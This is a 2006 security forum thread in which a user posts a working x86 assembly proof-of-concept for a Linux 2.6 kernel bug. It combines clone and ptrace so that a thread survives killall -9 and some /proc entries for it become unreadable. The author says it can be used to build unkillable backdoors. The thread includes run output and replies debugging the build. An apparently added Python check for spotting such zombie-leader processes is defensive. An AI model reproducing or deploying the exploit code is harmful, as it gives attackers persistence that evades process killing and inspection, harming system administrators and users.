IT Security and Insecurity Portal

NEW! Unkillable thread + procfs corruption

Posted: Tue Jan 10, 2006 4:28 pm
erg0t (Valuable expert)
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay

This is a new PoC of the old bug I found, now it can run the thread!!!
And in the old bug, the thread could be killed by re-attaching it, now it can't!!!
And one more thing, some of the ProcFS info is corrupted, so you can't see some things such as maps, mem, and tasks.
I'm testing on a 2.6.11, last time on a 2.6.13 the old version worked.
A friend told me that in 2.6.14 you can kill it.
Please try it and post your results!
This bug can be used to code unkillable backdoors, forcing the admin to reboot.
Quote:
[global main]                   ; missing from the original paste, added per the author's later correction
CLONE_VM equ 0x00000100
CLONE_THREAD equ 0x00010000
CLONE_SIGHAND equ 0x00000800
SIGCHLD equ 17
[extern printf]
[section .data]
forked db " >> fork: %d",10,0
[section .text]
no_child:                       ; parent after fork(): print the child's pid and exit(0)
push eax
push forked
call printf
xor ebx, ebx
mov eax, 1                      ; sys_exit
call 0xffffe400                 ; __kernel_vsyscall entry in the fixed vsyscall page
bad:                            ; clone() returned an error
[section .data]
..@4.cadena: db " !! Can't create thread",10
[section .text]
mov ebx, 1                      ; fd 1 (stdout)
mov ecx, ..@4.cadena
mov edx, 23+1                   ; message length including the newline
mov eax, 4                      ; sys_write
call 0xffffe400
mov ebx, -1
mov eax, 1                      ; sys_exit(-1)
call 0xffffe400
main:
mov eax, 2                      ; sys_fork
call 0xffffe400
test eax, eax
jnz no_child                    ; eax != 0: we are the parent
[section .data]
..@13.cadena: db " >> Creating thread...",10
[section .text]
mov ebx, 1
mov ecx, ..@13.cadena
mov edx, 22+1
mov eax, 4                      ; sys_write
call 0xffffe400
mov ebx, CLONE_VM | CLONE_THREAD | CLONE_SIGHAND | SIGCHLD   ; clone flags
xor ecx, ecx                    ; child_stack = NULL: the new thread shares this stack
mov eax, 120                    ; sys_clone, entered through the vsyscall page
call 0xffffe400
test eax, eax
jz child                        ; eax == 0: we are the new thread
test eax, 0x80000000            ; sign bit set: negative errno
jnz bad
xor ebx, ebx
mov eax, 1                      ; sys_exit(0): only the group leader exits, the thread stays
call 0xffffe400
child:
xor ebx, ebx                    ; PTRACE_TRACEME
mov eax, 26                     ; sys_ptrace
call 0xffffe400
test eax, eax
jnz bad2
[section .data]
..@26.cadena: db " >> Thread attached and running",10
[section .text]
mov ebx, 1
mov ecx, ..@26.cadena
mov edx, 31+1
mov eax, 4                      ; sys_write
call 0xffffe400
aki: jmp aki                    ; spin forever
bad2:                           ; ptrace(PTRACE_TRACEME) failed
[section .data]
..@32.cadena: db " !! Can't attach",10
[section .text]
mov ebx, 1
mov ecx, ..@32.cadena
mov edx, 16+1
mov eax, 4                      ; sys_write
call 0xffffe400
mov ebx, -1
mov eax, 1                      ; sys_exit(-1)
call 0xffffe400
Quote:
erg0t nasm # nasm -felf test.asm ; gcc test.o -o test ; ./test
>> Creating thread...
>> fork: 8407
erg0t nasm # >> Thread attached and running
killall -9 test ; ps -A | grep test
8407 pts/0 00:00:27 test <defunct>
erg0t nasm # ls /proc/8407
auxv cmdline cwd environ exe fd maps mem mounts oom_adj oom_score root stat statm status task
erg0t nasm # cat /proc/8407/*
cat: /proc/8407/cwd: No existe el fichero o el directorio
cat: /proc/8407/exe: No existe el fichero o el directorio
cat: /proc/8407/fd: No existe el fichero o el directorio
cat: /proc/8407/mem: No existe el fichero o el directorio
cat: /proc/8407/mounts: Argumento inválido
0
0
cat: /proc/8407/root: No existe el fichero o el directorio
8407 (test) Z 1 8406 7842 34816 8417 76 1 0 0 0 2764 5 0 0 17 0 2 0 1002050 0 0 4294967295 0 0 0 0 0 256 0 0 0 4294967295 0 0 17 0 0 0
0 0 0 0 0 0 0
Name: test
State: Z (zombie)
SleepAVG: 58%
Tgid: 8407
Pid: 8407
PPid: 1
TracerPid: 0
Uid: 0 0 0 0
Gid: 0 0 0 0
FDSize: 0
Groups: 0 1 2 3 4 6 10 11 20 26 27
Threads: 2
SigPnd: 0000000000000100
ShdPnd: 0000000000000100
SigBlk: 0000000080000000
SigIgn: 0000000000000000
SigCgt: 0000000000000000
CapInh: 0000000000000000
CapPrm: 00000000fffffeff
CapEff: 00000000fffffeff
cat: /proc/8407/task: No existe el fichero o el directorio
erg0t nasm # uname -a
Linux erg0t 2.6.11 #1 Tue Dec 13 19:38:25 GMT 2005 i686 AMD Athlon(tm) XP 2000+ AuthenticAMD GNU/Linux
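
A defender-side check for the state the output above shows: the group leader is State Z with Threads: 2, so a sibling thread is still running inside a process that ps lists as <defunct>. This is an added example, not code from the original post; it parses the /proc/<pid>/status format quoted above, with a sample constructed from those fields.

```python
"""Flag thread-group leaders that are zombies while sibling threads still run."""
import os

# Constructed sample modelled on the /proc/8407/status output quoted above.
SAMPLE_STATUS = """\
Name:\ttest
State:\tZ (zombie)
Tgid:\t8407
Pid:\t8407
PPid:\t1
TracerPid:\t0
Threads:\t2
SigPnd:\t0000000000000100
"""


def parse_status(text):
    """Return the status fields as a dict, e.g. {'State': 'Z (zombie)', ...}."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def is_zombie_leader_with_live_threads(fields):
    """True when the leader (Pid == Tgid) is State Z but more than one thread is counted."""
    state = fields.get("State", "")
    threads = int(fields.get("Threads", "1") or 1)
    is_leader = fields.get("Pid") == fields.get("Tgid")
    return state.startswith("Z") and is_leader and threads > 1


def scan_proc(proc="/proc"):
    """Scan a live /proc and return (pid, name, threads) for every flagged leader."""
    flagged = []
    if not os.path.isdir(proc):
        return flagged
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc, entry, "status")) as fh:
                fields = parse_status(fh.read())
        except OSError:
            continue  # process vanished or status not readable
        if is_zombie_leader_with_live_threads(fields):
            flagged.append((int(entry), fields.get("Name", "?"), int(fields["Threads"])))
    return flagged


if __name__ == "__main__":
    print("sample flagged:", is_zombie_leader_with_live_threads(parse_status(SAMPLE_STATUS)))
    for pid, name, n in scan_proc():
        print(f"pid {pid} ({name}): zombie leader with {n} threads")
```

The same pattern appears legitimately when a leader exits with pthread_exit() while its threads keep working, so treat hits as candidates to review; the anomaly in the thread above is that the group survived killall -9.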

Posted: Tue Jan 10, 2006 5:33 pm
erg0t (Valuable expert)
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay

well, I did some more tests, and the thread is terminated, but the structures are still there, so it is really killed.
I will try to do some more tests to see if I can find a way to keep the thread running.

Posted: Wed Jan 11, 2006 10:41 am
fizzi (Advanced user)
Joined: Sep 14, 2005
Posts: 55

hi
I tried to compile your prog under amd64 but it didn't work. I got kernel 2.6.15 and I get
Quote:
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../lib64/crt1.o(.text+0x21): In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'
perhaps u can tell me how to get this thing compiled for amd64 or 32bit arch.

Posted: Wed Jan 11, 2006 2:42 pm
erg0t (Valuable expert)
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay

fizzi wrote:
hi
I tried to compile your prog under amd64 but it didn't work. I got kernel 2.6.15 and I get
Quote:
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../lib64/crt1.o(.text+0x21): In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'
perhaps u can tell me how to get this thing compiled for amd64 or 32bit arch.

It's only for x86.

Posted: Wed Jan 11, 2006 3:09 pm
fizzi (Advanced user)
Joined: Sep 14, 2005
Posts: 55

yeah, but isn't amd64 compatible with 32bit programs?
so, this should also work on my x86_64 architecture, but it just won't compile.

Posted: Thu Jan 12, 2006 1:21 am
shai-tan (Valuable expert)
Joined: Feb 22, 2005
Posts: 477

Hey erg0t, how's everything holding up? Ah, isn't assembly great...
Anywayz:
Code:
shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status
This is on 2.6.12.
Bloody hell, I wish the kernel team had made a 2.7 development kernel, because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed to keep the Linux kernel up to the likes of the new GNU/Hurd kernel.
Shai-tan

_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds


Posted: Thu Jan 12, 2006 3:32 pm
erg0t (Valuable expert)
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay

shai-tan wrote:
Hey erg0t, how's everything holding up? Ah, isn't assembly great...
Anywayz:
Code:
shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status
This is on 2.6.12.
Bloody hell, I wish the kernel team had made a 2.7 development kernel, because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed to keep the Linux kernel up to the likes of the new GNU/Hurd kernel.
Shai-tan

Hi, I have NASM version 0.98.39 compiled on Dec 15 2005 and
gcc versión 3.3.6 (Gentoo 3.3.6, ssp-3.3.6-1.0, pie-8.7.
btw I sent a patch for another bug in clone and it was added to the -mm tree.
It's called i386-sys_clone-from-vsyscall.patch
I'm very happy

Posted: Thu Jan 12, 2006 5:21 pm
shai-tan (Valuable expert)
Joined: Feb 22, 2005
Posts: 477

Ah, maybe it's gcc 4.0 which is breaking it.
Shai-tan

Posted: Thu Jan 12, 2006 7:29 pm |
|
|
fizzi |
Advanced user |
|
|
Joined: Sep 14, 2005 |
Posts: 55 |
|
|
|
|
|
|
|
shai-tan wrote:
Hey erg0t, how's everything holding up? Ah, isn't assembly great...
Anywayz:
Code:
shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status
This is on 2.6.12.
Bloody hell, I wish the kernel team had made a 2.7 development kernel, because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed to keep the Linux kernel up to the likes of the new GNU/Hurd kernel.
Shai-tan

As I can see, this is the same error message I get when I try to compile this thingy. but I got amd64 and gcc 3.4.4
"undefined reference to main" ... seems it can't find the main routine. so ... any other linker or compiler I can choose?

Posted: Thu Jan 12, 2006 7:37 pm
fizzi (Advanced user)
Joined: Sep 14, 2005
Posts: 55

Quote:
gcc -nostartfiles -o test test.o
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output

Ok, I'm getting closer ...

Posted: Thu Jan 12, 2006 7:47 pm
fizzi (Advanced user)
Joined: Sep 14, 2005
Posts: 55

Quote:
gcc -nostartfiles -m32 -o test -pipe -march=i386 -mcpu=i686 -fno-strength-reduce -fno-strict-aliasing -pipe test.o
collect2: ld terminated with signal 11 [Segmentation fault]

I give up.

Posted: Thu Jan 12, 2006 8:07 pm
erg0t (Valuable expert)
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay

fizzi wrote:
Quote:
gcc -nostartfiles -m32 -o test -pipe -march=i386 -mcpu=i686 -fno-strength-reduce -fno-strict-aliasing -pipe test.o
collect2: ld terminated with signal 11 [Segmentation fault]

I give up.

The problem is that nasm generates code only for x86, maybe you can convert the code to gas.

Posted: Fri Jan 13, 2006 6:05 am
shai-tan (Valuable expert)
Joined: Feb 22, 2005
Posts: 477

Well, I use x86, so why is it not working?
Shai-tan

Posted: Fri Jan 13, 2006 10:02 am |
|
|
erg0t |
Valuable expert |
|
|
Joined: Apr 08, 2005 |
Posts: 55 |
Location: Uruguay |
|
|
|
|
|
|
shai-tan wrote:
Well, I use x86, so why is it not working?
Shai-tan

Sorry, I know what is happening. I use a lot of macros I made for my code, so to get code that everyone could compile I used nasm -e and posted the output, but by mistake I didn't select one line before containing [global main]. So to get the code working you have to add global main to the top of the code.

Posted: Fri Jan 13, 2006 10:17 am
shai-tan (Valuable expert)
Joined: Feb 22, 2005
Posts: 477

Ah, I see.
Thanks. I'll get round to it later 'cause I'm a bit busy tonight. I'll tell you what happens.
Shai-tan

www.waraxe.us Forum Index -> Linux world